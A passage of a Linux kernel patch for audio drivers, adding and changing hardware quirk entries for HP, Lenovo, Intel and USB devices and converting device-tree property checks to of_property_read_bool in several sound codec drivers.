+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9697,7 +9762,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+-	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC225_FIXUP_HEADSET_JACK),
++	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -9831,14 +9896,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22be, "Thinkpad X1 Carbon 8th", ALC285_FIXUP_THINKPAD_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c1, "Thinkpad P1 Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c2, "Thinkpad X1 Extreme Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+-	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+@@ -9920,7 +9985,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+-	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC225_FIXUP_HEADSET_JACK),
++	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+@@ -10402,6 +10467,10 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+ 		{0x17, 0x90170111},
+ 		{0x19, 0x03a11030},
+ 		{0x21, 0x03211020}),
++	SND_HDA_PIN_QUIRK(0x10ec0287, 0x17aa, "Lenovo", ALC287_FIXUP_THINKPAD_I2S_SPK,
++		{0x17, 0x90170110},
++		{0x19, 0x03a11030},
++		{0x21, 0x03211020}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0286, 0x1025, "Acer", ALC286_FIXUP_ACER_AIO_MIC_NO_PRESENCE,
+ 		{0x12, 0x90a60130},
+ 		{0x17, 0x90170110},
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 533250efcbd83..c494de5f5c066 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -234,6 +234,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82YM"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/sta32x.c b/sound/soc/codecs/sta32x.c
+index 8c86b578eba83..29af9595dac19 100644
+--- a/sound/soc/codecs/sta32x.c
++++ b/sound/soc/codecs/sta32x.c
+@@ -1054,35 +1054,32 @@ static int sta32x_probe_dt(struct device *dev, struct sta32x_priv *sta32x)
+ 	of_property_read_u8(np, "st,ch3-output-mapping",
+ 			    &pdata->ch3_output_mapping);
+ 
+-	if (of_get_property(np, "st,fault-detect-recovery", NULL))
+-		pdata->fault_detect_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-recovery", NULL))
+-		pdata->thermal_warning_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-adjustment", NULL))
+-		pdata->thermal_warning_adjustment = 1;
+-	if (of_get_property(np, "st,needs_esd_watchdog", NULL))
+-		pdata->needs_esd_watchdog = 1;
++	pdata->fault_detect_recovery =
++		of_property_read_bool(np, "st,fault-detect-recovery");
++	pdata->thermal_warning_recovery =
++		of_property_read_bool(np, "st,thermal-warning-recovery");
++	pdata->thermal_warning_adjustment =
++		of_property_read_bool(np, "st,thermal-warning-adjustment");
++	pdata->needs_esd_watchdog =
++		of_property_read_bool(np, "st,needs_esd_watchdog");
+ 
+ 	tmp = 140;
+ 	of_property_read_u16(np, "st,drop-compensation-ns", &tmp);
+ 	pdata->drop_compensation_ns = clamp_t(u16, tmp, 0, 300) / 20;
+ 
+ 	/* CONFE */
+-	if (of_get_property(np, "st,max-power-use-mpcc", NULL))
+-		pdata->max_power_use_mpcc = 1;
+-
+-	if (of_get_property(np, "st,max-power-correction", NULL))
+-		pdata->max_power_correction = 1;
+-
+-	if (of_get_property(np, "st,am-reduction-mode", NULL))
+-		pdata->am_reduction_mode = 1;
+-
+-	if (of_get_property(np, "st,odd-pwm-speed-mode", NULL))
+-		pdata->odd_pwm_speed_mode = 1;
++	pdata->max_power_use_mpcc =
++		of_property_read_bool(np, "st,max-power-use-mpcc");
++	pdata->max_power_correction =
++		of_property_read_bool(np, "st,max-power-correction");
++	pdata->am_reduction_mode =
++		of_property_read_bool(np, "st,am-reduction-mode");
++	pdata->odd_pwm_speed_mode =
++		of_property_read_bool(np, "st,odd-pwm-speed-mode");
+ 
+ 	/* CONFF */
+-	if (of_get_property(np, "st,invalid-input-detect-mute", NULL))
+-		pdata->invalid_input_detect_mute = 1;
++	pdata->invalid_input_detect_mute =
++		of_property_read_bool(np, "st,invalid-input-detect-mute");
+ 
+ 	sta32x->pdata = pdata;
+ 
+diff --git a/sound/soc/codecs/sta350.c b/sound/soc/codecs/sta350.c
+index 9ed13aeb3cbdc..b033a5fcd6c04 100644
+--- a/sound/soc/codecs/sta350.c
++++ b/sound/soc/codecs/sta350.c
+@@ -1106,12 +1106,12 @@ static int sta350_probe_dt(struct device *dev, struct sta350_priv *sta350)
+ 	of_property_read_u8(np, "st,ch3-output-mapping",
+ 			    &pdata->ch3_output_mapping);
+ 
+-	if (of_get_property(np, "st,thermal-warning-recovery", NULL))
+-		pdata->thermal_warning_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-adjustment", NULL))
+-		pdata->thermal_warning_adjustment = 1;
+-	if (of_get_property(np, "st,fault-detect-recovery", NULL))
+-		pdata->fault_detect_recovery = 1;
++	pdata->thermal_warning_recovery =
++		of_property_read_bool(np, "st,thermal-warning-recovery");
++	pdata->thermal_warning_adjustment =
++		of_property_read_bool(np, "st,thermal-warning-adjustment");
++	pdata->fault_detect_recovery =
++		of_property_read_bool(np, "st,fault-detect-recovery");
+ 
+ 	pdata->ffx_power_output_mode = STA350_FFX_PM_VARIABLE_DROP_COMP;
+ 	if (!of_property_read_string(np, "st,ffx-power-output-mode",
+@@ -1133,41 +1133,34 @@ static int sta350_probe_dt(struct device *dev, struct sta350_priv *sta350)
+ 	of_property_read_u16(np, "st,drop-compensation-ns", &tmp);
+ 	pdata->drop_compensation_ns = clamp_t(u16, tmp, 0, 300) / 20;
+ 
+-	if (of_get_property(np, "st,overcurrent-warning-adjustment", NULL))
+-		pdata->oc_warning_adjustment = 1;
++	pdata->oc_warning_adjustment =
++		of_property_read_bool(np, "st,overcurrent-warning-adjustment");
+ 
+ 	/* CONFE */
+-	if (of_get_property(np, "st,max-power-use-mpcc", NULL))
+-		pdata->max_power_use_mpcc = 1;
+-
+-	if (of_get_property(np, "st,max-power-correction", NULL))
+-		pdata->max_power_correction = 1;
+-
+-	if (of_get_property(np, "st,am-reduction-mode", NULL))
+-		pdata->am_reduction_mode = 1;
+-
+-	if (of_get_property(np, "st,odd-pwm-speed-mode", NULL))
+-		pdata->odd_pwm_speed_mode = 1;
+-
+-	if (of_get_property(np, "st,distortion-compensation", NULL))
+-		pdata->distortion_compensation = 1;
++	pdata->max_power_use_mpcc =
++		of_property_read_bool(np, "st,max-power-use-mpcc");
++	pdata->max_power_correction =
++		of_property_read_bool(np, "st,max-power-correction");
++	pdata->am_reduction_mode =
++		of_property_read_bool(np, "st,am-reduction-mode");
++	pdata->odd_pwm_speed_mode =
++		of_property_read_bool(np, "st,odd-pwm-speed-mode");
++	pdata->distortion_compensation =
++		of_property_read_bool(np, "st,distortion-compensation");
+ 
+ 	/* CONFF */
+-	if (of_get_property(np, "st,invalid-input-detect-mute", NULL))
+-		pdata->invalid_input_detect_mute = 1;
++	pdata->invalid_input_detect_mute =
++		of_property_read_bool(np, "st,invalid-input-detect-mute");
+ 
+ 	/* MISC */
+-	if (of_get_property(np, "st,activate-mute-output", NULL))
+-		pdata->activate_mute_output = 1;
+-
+-	if (of_get_property(np, "st,bridge-immediate-off", NULL))
+-		pdata->bridge_immediate_off = 1;
+-
+-	if (of_get_property(np, "st,noise-shape-dc-cut", NULL))
+-		pdata->noise_shape_dc_cut = 1;
+-
+-	if (of_get_property(np, "st,powerdown-master-volume", NULL))
+-		pdata->powerdown_master_vol = 1;
++	pdata->activate_mute_output =
++		of_property_read_bool(np, "st,activate-mute-output");
++	pdata->bridge_immediate_off =
++		of_property_read_bool(np, "st,bridge-immediate-off");
++	pdata->noise_shape_dc_cut =
++		of_property_read_bool(np, "st,noise-shape-dc-cut");
++	pdata->powerdown_master_vol =
++		of_property_read_bool(np, "st,powerdown-master-volume");
+ 
+ 	if (!of_property_read_u8(np, "st,powerdown-delay-divider", &tmp8)) {
+ 		if (is_power_of_2(tmp8) && tmp8 >= 1 && tmp8 <= 128)
+diff --git a/sound/soc/codecs/tas5086.c b/sound/soc/codecs/tas5086.c
+index 22143cc5afa70..f9e7122894bd2 100644
+--- a/sound/soc/codecs/tas5086.c
++++ b/sound/soc/codecs/tas5086.c
+@@ -840,7 +840,7 @@ static int tas5086_probe(struct snd_soc_component *component)
+ 			snprintf(name, sizeof(name),
+ 				 "ti,mid-z-channel-%d", i + 1);
+ 
+-			if (of_get_property(of_node, name, NULL) != NULL)
++			if (of_property_read_bool(of_node, name))
+ 				priv->pwm_start_mid_z |= 1 << i;
+ 		}
+ 	}
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index b7552b0df7c3c..96fd9095e544b 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -710,10 +710,15 @@ static void fsl_sai_config_disable(struct fsl_sai *sai, int dir)
+ {
+ 	unsigned int ofs = sai->soc_data->reg_offset;
+ 	bool tx = dir == TX;
+-	u32 xcsr, count = 100;
++	u32 xcsr, count = 100, mask;
++
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output)
++		mask = FSL_SAI_CSR_TERE;
++	else
++		mask = FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE;
+ 
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCSR(tx, ofs),
+-			   FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE, 0);
++			   mask, 0);
+ 
+ 	/* TERE will remain set till the end of current frame */
+ 	do {
+@@ -1381,18 +1386,18 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 	sai->cpu_dai_drv.symmetric_channels = 1;
+ 	sai->cpu_dai_drv.symmetric_sample_bits = 1;
+ 
+-	if (of_find_property(np, "fsl,sai-synchronous-rx", NULL) &&
+-	    of_find_property(np, "fsl,sai-asynchronous", NULL)) {
++	if (of_property_read_bool(np, "fsl,sai-synchronous-rx") &&
++	    of_property_read_bool(np, "fsl,sai-asynchronous")) {
+ 		/* error out if both synchronous and asynchronous are present */
+ 		dev_err(dev, "invalid binding for synchronous mode\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	if (of_find_property(np, "fsl,sai-synchronous-rx", NULL)) {
++	if (of_property_read_bool(np, "fsl,sai-synchronous-rx")) {
+ 		/* Sync Rx with Tx */
+ 		sai->synchronous[RX] = false;
+ 		sai->synchronous[TX] = true;
+-	} else if (of_find_property(np, "fsl,sai-asynchronous", NULL)) {
++	} else if (of_property_read_bool(np, "fsl,sai-asynchronous")) {
+ 		/* Discard all settings for asynchronous mode */
+ 		sai->synchronous[RX] = false;
+ 		sai->synchronous[TX] = false;
+@@ -1401,7 +1406,9 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 		sai->cpu_dai_drv.symmetric_sample_bits = 0;
+ 	}
+ 
+-	if (of_find_property(np, "fsl,sai-mclk-direction-output", NULL) &&
++	sai->mclk_direction_output = of_property_read_bool(np, "fsl,sai-mclk-direction-output");
++
++	if (sai->mclk_direction_output &&
+ 	    of_device_is_compatible(np, "fsl,imx6ul-sai")) {
+ 		gpr = syscon_regmap_lookup_by_compatible("fsl,imx6ul-iomuxc-gpr");
+ 		if (IS_ERR(gpr)) {
+@@ -1442,7 +1449,7 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 		dev_warn(dev, "Error reading SAI version: %d\n", ret);
+ 
+ 	/* Select MCLK direction */
+-	if (of_find_property(np, "fsl,sai-mclk-direction-output", NULL) &&
++	if (sai->mclk_direction_output &&
+ 	    sai->soc_data->max_register >= FSL_SAI_MCTL) {
+ 		regmap_update_bits(sai->regmap, FSL_SAI_MCTL,
+ 				   FSL_SAI_MCTL_MCLK_EN, FSL_SAI_MCTL_MCLK_EN);
+@@ -1560,6 +1567,17 @@ static const struct fsl_sai_soc_data fsl_sai_imx8mm_data = {
+ 	.max_register = FSL_SAI_MCTL,
+ };
+ 
++static const struct fsl_sai_soc_data fsl_sai_imx8mn_data = {
++	.use_imx_pcm = true,
++	.use_edma = false,
++	.fifo_depth = 128,
++	.reg_offset = 8,
++	.mclk0_is_mclk1 = false,
++	.pins = 8,
++	.flags = 0,
++	.max_register = FSL_SAI_MDIV,
++};
++
+ static const struct fsl_sai_soc_data fsl_sai_imx8mp_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = false,
+@@ -1569,6 +1587,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8mp_data = {
+ 	.pins = 8,
+ 	.flags = 0,
+ 	.max_register = FSL_SAI_MDIV,
++	.mclk_with_tere = true,
+ };
+ 
+ static const struct fsl_sai_soc_data fsl_sai_imx8ulp_data = {
+@@ -1592,7 +1611,7 @@ static const struct of_device_id fsl_sai_ids[] = {
+ 	{ .compatible = "fsl,imx8mm-sai", .data = &fsl_sai_imx8mm_data },
+ 	{ .compatible = "fsl,imx8mp-sai", .data = &fsl_sai_imx8mp_data },
+ 	{ .compatible = "fsl,imx8ulp-sai", .data = &fsl_sai_imx8ulp_data },
+-	{ .compatible = "fsl,imx8mn-sai", .data = &fsl_sai_imx8mp_data },
++	{ .compatible = "fsl,imx8mn-sai", .data = &fsl_sai_imx8mn_data },
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, fsl_sai_ids);
+@@ -1656,6 +1675,10 @@ static int fsl_sai_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		goto disable_rx_clk;
+ 
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output)
++		regmap_update_bits(sai->regmap, FSL_SAI_TCSR(ofs),
++				   FSL_SAI_CSR_TERE, FSL_SAI_CSR_TERE);
++
+ 	return 0;
+ 
+ disable_rx_clk:
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index caad5b0ac4ff4..b4d616a44023c 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -232,6 +232,7 @@ struct fsl_sai_soc_data {
+ 	bool use_imx_pcm;
+ 	bool use_edma;
+ 	bool mclk0_is_mclk1;
++	bool mclk_with_tere;
+ 	unsigned int fifo_depth;
+ 	unsigned int pins;
+ 	unsigned int reg_offset;
+@@ -288,6 +289,7 @@ struct fsl_sai {
+ 	bool synchronous[2];
+ 	struct fsl_sai_dl_cfg *dl_cfg;
+ 	unsigned int dl_cfg_cnt;
++	bool mclk_direction_output;
+ 
+ 	unsigned int mclk_id[2];
+ 	unsigned int mclk_streams;
+diff --git a/sound/soc/fsl/fsl_ssi.c b/sound/soc/fsl/fsl_ssi.c
+index 46a53551b955c..6af00b62a60fa 100644
+--- a/sound/soc/fsl/fsl_ssi.c
++++ b/sound/soc/fsl/fsl_ssi.c
+@@ -1447,7 +1447,7 @@ static int fsl_ssi_probe_from_dt(struct fsl_ssi *ssi)
+ 			return -EINVAL;
+ 		}
+ 		strcpy(ssi->card_name, "ac97-codec");
+-	} else if (!of_find_property(np, "fsl,ssi-asynchronous", NULL)) {
++	} else if (!of_property_read_bool(np, "fsl,ssi-asynchronous")) {
+ 		/*
+ 		 * In synchronous mode, STCK and STFS ports are used by RX
+ 		 * as well. So the software should limit the sample rates,
+diff --git a/sound/soc/fsl/imx-card.c b/sound/soc/fsl/imx-card.c
+index 3f128ced41809..64a4d7e9db603 100644
+--- a/sound/soc/fsl/imx-card.c
++++ b/sound/soc/fsl/imx-card.c
+@@ -563,7 +563,7 @@ static int imx_card_parse_of(struct imx_card_data *data)
+ 			link_data->cpu_sysclk_id = FSL_SAI_CLK_MAST1;
+ 
+ 			/* sai may support mclk/bclk = 1 */
+-			if (of_find_property(np, "fsl,mclk-equal-bclk", NULL)) {
++			if (of_property_read_bool(np, "fsl,mclk-equal-bclk")) {
+ 				link_data->one2one_ratio = true;
+ 			} else {
+ 				int i;
+diff --git a/sound/soc/generic/simple-card-utils.c b/sound/soc/generic/simple-card-utils.c
+index 8811321717fbb..c719354635a3a 100644
+--- a/sound/soc/generic/simple-card-utils.c
++++ b/sound/soc/generic/simple-card-utils.c
+@@ -331,7 +331,8 @@ int asoc_simple_startup(struct snd_pcm_substream *substream)
+ 		if (fixed_sysclk % props->mclk_fs) {
+ 			dev_err(rtd->dev, "fixed sysclk %u not divisible by mclk_fs %u\n",
+ 				fixed_sysclk, props->mclk_fs);
+-			return -EINVAL;
++			ret = -EINVAL;
++			goto codec_err;
+ 		}
+ 		ret = snd_pcm_hw_constraint_minmax(substream->runtime, SNDRV_PCM_HW_PARAM_RATE,
+ 			fixed_rate, fixed_rate);
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 894b6610b9e27..e22d767b6e97a 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -807,6 +807,16 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_ES8336_SPEAKERS_EN_GPIO1_QUIRK |
+ 					SOF_ES8336_JD_INVERTED),
+ 	},
++	{
++		.name = "mtl_es83x6_c1_h02",
++		.driver_data = (kernel_ulong_t)(SOF_ES8336_SSP_CODEC(1) |
++					SOF_NO_OF_HDMI_CAPTURE_SSP(2) |
++					SOF_HDMI_CAPTURE_1_SSP(0) |
++					SOF_HDMI_CAPTURE_2_SSP(2) |
++					SOF_SSP_HDMI_CAPTURE_PRESENT |
++					SOF_ES8336_SPEAKERS_EN_GPIO1_QUIRK |
++					SOF_ES8336_JD_INVERTED),
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(platform, board_ids);
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 414ac90273810..985012f2003e2 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -347,6 +347,16 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		/* No Jack */
+ 		.driver_data = (void *)SOF_SDW_TGL_HDMI,
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_SKU, "0B14"),
++		},
++		/* No Jack */
++		.driver_data = (void *)SOF_SDW_TGL_HDMI,
++	},
++
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+ 		.matches = {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+index 36c361fb28a4d..d3b4689460ecf 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+@@ -20,6 +20,16 @@ static const struct snd_soc_acpi_codecs mtl_rt5682_rt5682s_hp = {
+ 	.codecs = {"10EC5682", "RTL5682"},
+ };
+ 
++static const struct snd_soc_acpi_codecs mtl_lt6911_hdmi = {
++	.num_codecs = 1,
++	.codecs = {"INTC10B0"}
++};
++
++static const struct snd_soc_acpi_codecs mtl_essx_83x6 = {
++	.num_codecs = 3,
++	.codecs = { "ESSX8316", "ESSX8326", "ESSX8336"},
++};
++
+ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 	{
+ 		.comp_ids = &mtl_rt5682_rt5682s_hp,
+@@ -28,6 +38,14 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 		.quirk_data = &mtl_max98357a_amp,
+ 		.sof_tplg_filename = "sof-mtl-max98357a-rt5682.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_essx_83x6,
++		.drv_name = "sof-essx8336",
++		.sof_tplg_filename = "sof-mtl-es8336", /* the tplg suffix is added at run time */
++		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
++					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
++					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
++	},
+ 	{},
+ };
+ EXPORT_SYMBOL_GPL(snd_soc_acpi_intel_mtl_machines);
+@@ -66,6 +84,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-mtl-rt711-rt1308-rt715.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_essx_83x6,
++		.drv_name = "mtl_es83x6_c1_h02",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &mtl_lt6911_hdmi,
++		.sof_tplg_filename = "sof-mtl-es83x6-ssp1-hdmi-ssp02.tplg",
++	},
+ 	{
+ 		.link_mask = BIT(0) | BIT(1) | BIT(3),
+ 		.links = sdw_mockup_headset_1amp_mic,
+diff --git a/sound/soc/sh/rcar/ssi.c b/sound/soc/sh/rcar/ssi.c
+index 7ade6c5ed96ff..cb7fff48959a2 100644
+--- a/sound/soc/sh/rcar/ssi.c
++++ b/sound/soc/sh/rcar/ssi.c
+@@ -1208,10 +1208,10 @@ int rsnd_ssi_probe(struct rsnd_priv *priv)
+ 			goto rsnd_ssi_probe_done;
+ 		}
+ 
+-		if (of_get_property(np, "shared-pin", NULL))
++		if (of_property_read_bool(np, "shared-pin"))
+ 			rsnd_flags_set(ssi, RSND_SSI_CLK_PIN_SHARE);
+ 
+-		if (of_get_property(np, "no-busif", NULL))
++		if (of_property_read_bool(np, "no-busif"))
+ 			rsnd_flags_set(ssi, RSND_SSI_NO_BUSIF);
+ 
+ 		ssi->irq = irq_of_parse_and_map(np, 0);
+diff --git a/sound/soc/sof/amd/pci-rmb.c b/sound/soc/sof/amd/pci-rmb.c
+index 5698d910b26f3..6fa060cab657e 100644
+--- a/sound/soc/sof/amd/pci-rmb.c
++++ b/sound/soc/sof/amd/pci-rmb.c
+@@ -54,7 +54,6 @@ static const struct sof_amd_acp_desc rembrandt_chip_info = {
+ 	.sram_pte_offset = ACP6X_SRAM_PTE_OFFSET,
+ 	.i2s_pin_config_offset = ACP6X_I2S_PIN_CONFIG,
+ 	.hw_semaphore_offset = ACP6X_AXI2DAGB_SEM_0,
+-	.acp_clkmux_sel = ACP6X_CLKMUX_SEL,
+ 	.fusion_dsp_offset = ACP6X_DSP_FUSION_RUNSTALL,
+ };
+ 
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 9105ec623120a..783a2493707ea 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -1204,6 +1204,13 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval,
+ 			cval->res = 16;
+ 		}
+ 		break;
++	case USB_ID(0x1bcf, 0x2283): /* NexiGo N930AF FHD Webcam */
++		if (!strcmp(kctl->id.name, "Mic Capture Volume")) {
++			usb_audio_info(chip,
++				"set resolution quirk: cval->res = 16\n");
++			cval->res = 16;
++		}
++		break;
+ 	}
+ }
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 4667d543f7481..6129a62316422 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1992,7 +1992,11 @@ void snd_usb_audioformat_attributes_quirk(struct snd_usb_audio *chip,
+ 		/* mic works only when ep packet size is set to wMaxPacketSize */
+ 		fp->attributes |= UAC_EP_CS_ATTR_FILL_MAX;
+ 		break;
+-
++	case USB_ID(0x3511, 0x2b1e): /* Opencomm2 UC USB Bluetooth dongle */
++		/* mic works only when ep pitch control is not set */
++		if (stream == SNDRV_PCM_STREAM_CAPTURE)
++			fp->attributes &= ~UAC_EP_CS_ATTR_PITCH_CONTROL;
++		break;
+ 	}
+ }
+ 
+@@ -2171,6 +2175,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
++	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */


